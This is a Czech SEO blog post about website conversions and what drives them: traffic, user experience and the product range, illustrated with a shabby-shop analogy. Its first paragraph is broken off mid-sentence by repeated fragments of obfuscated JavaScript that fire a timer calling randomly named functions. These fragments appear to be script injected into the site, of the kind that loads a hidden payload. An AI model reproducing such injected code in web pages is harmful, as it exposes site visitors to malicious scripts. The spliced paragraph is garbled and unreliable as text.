0

Konverze – chcete je?

Kategorie: SEO - omyly, fakta, souvislosti

Kdo by nechtěl! Snad jen ten, kdo neví oč jde…

 

 

Konverze je z hlediska SEO definována jako přeměna návštěvníka na zákazníka. To je tedy přesně to, co chcete. Konverze totiž nemusí být jen objednání produktu v e-shopu, jako konverzi si můžete definovat například kliknutí na „like“ na vašich stránkách nebo odeslání kontaktního formuláře.andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

 

Podívejme se ve stručnosti na faktory, které konverzi ovlivňují:

– Návštěvnost (ta je dána pozicí ve vyhledávačích, optimalizací textů na stránkách, kvalitním obsahem a mnoho dalšími faktory)

– UX – neboli uživatelský prožitek – určuje, nakolik jsou vaše stránky pro návštěvníky přehledné a „líbivé“ ..na ošklivém e-shopu si přece nekoupíte hezkou kabelku… Stejně tak si ji nekoupíte, když se k ní nedokážete proklikat skrze tuny balastu

– Vlastní produkt – šíře sortimentu, cena, různé akce a přidané hodnoty….

 

Toto jsou hlavní složky, které konverzi ovlivňují. Existuje samozřejmě nespočet dalších drobných faktorů, ale bez těchto se neobejdete.

 

Celá věc je velmi jednoduchá a je srovnatelná s běžným kamenným obchodem – představte si malý špinavý krámek (UX), v zapadlé uličce (pozice ve vyhledávačích), který prodává dvě luxusní kabelky (šíře sortimentu), ale neuvádí u nich značku, materiál ani jejich vlastnosti a výhody (obsah).

Je docela jisté, že v takovém krámku nenakoupíte. Ke konverzi je dlouhá cesta a právě konverze odráží nejprůkazněji kvalitu a komplexnost webu.

Je škoda, pokud máte většinu faktorů v pořádku, ale váš obchůdek je například v imaginární zapadlé uličce… I takový obchod se totiž dá prodat a ze zapadlé uličky udělat přátelské místo, kam se spousta lidí ráda vydává za dobrodružstvím a výhodnými nákupy!

 

 

Tweet about this on TwitterShare on FacebookEmail this to someone
lospapunos@seznam.cz'

Komentáře

Loading Facebook Comments ...

Napsat komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *

4 × 3 =